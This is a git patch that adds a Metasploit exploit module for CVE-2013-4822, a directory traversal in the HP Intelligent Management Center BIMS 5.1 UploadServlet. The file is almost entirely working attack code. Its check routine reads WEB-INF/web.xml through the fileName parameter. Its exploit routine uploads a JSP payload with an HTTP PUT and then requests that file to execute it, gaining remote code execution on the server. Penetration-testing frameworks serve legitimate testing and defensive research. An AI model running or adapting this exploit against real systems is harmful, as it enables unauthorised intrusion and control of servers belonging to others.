From cf239c2234bb51f2a851ccb2b29048c7d589c310 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 19 Oct 2013 00:05:09 -0500 Subject: [PATCH] Add module for ZDI-13-238 --- .../windows/http/hp_imc_bims_upload.rb | 98 +++++++++++++++++++ 1 file changed, 98 insertions(+) create mode 100644 modules/exploits/windows/http/hp_imc_bims_upload.rb diff --git a/modules/exploits/windows/http/hp_imc_bims_upload.rb b/modules/exploits/windows/http/hp_imc_bims_upload.rb new file mode 100644 index 0000000000..dd30617ebb --- /dev/null +++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb @@ -0,0 +1,98 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Intelligent Management Center BIMS UploadServlet Directory Traversal', + 'Description' => %q{ + This module exploits a directory traversal vulnerability on the version 5.1 of the BIMS + component from the HP Intelligent Management Center. The vulnerability exists in the + UploadServlet, allowing the user to download and upload arbitrary files. This module has + been tested successfully on HP Intelligent Management Center with BIMS 5.1 E0202 on Windows + 2003 SP2. + }, + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-4822' ], + [ 'OSVDB', '98247' ], + [ 'BID', '' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-238/' ], + [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943425' ] + ], + 'Privileged' => true, + 'Platform' => 'win', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'HP Intelligent Management Center 5.1 E0202 / BIMS 5.1 E0202 / Windows', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 08 2013')) + + register_options( + [ + Opt::RPORT(8080) + ], self.class) + end + + def check + res = send_request_cgi({ + 'uri' => normalize_uri("/", "upload", "upload"), + 'method' => 'GET', + 'vars_get' => { 'fileName' => "WEB-INF/web.xml" }, + }) + + if res and res.code == 200 and res.headers['Content-Type'] =~ /application\/doc/ and res.body =~ /com\.h3c\.imc\.bims\.acs\.server\.UploadServlet/ + return Exploit::CheckCode::Vulnerable + end + + return Exploit::CheckCode::Safe + end + + def exploit + # New lines are handled on the vuln app and payload is corrupted + #jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") + jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" + + print_status("#{peer} - Uploading the JSP payload...") + res = send_request_cgi({ + 'uri' => normalize_uri("/", "upload", "upload"), + 'method' => 'PUT', + 'vars_get' => { 'fileName' => jsp_name }, + 'data' => payload.encoded + }) + + if res and res.code == 200 and res.body.empty? + print_status("#{peer} - JSP payload uploaded successfully") + register_files_for_cleanup("..\\web\\apps\\upload\\#{jsp_name}") + else + fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") + end + + print_status("#{peer} - Executing payload...") + send_request_cgi({ + 'uri' => normalize_uri("/", "upload", jsp_name), + 'method' => 'GET' + }, 1) + + end + +end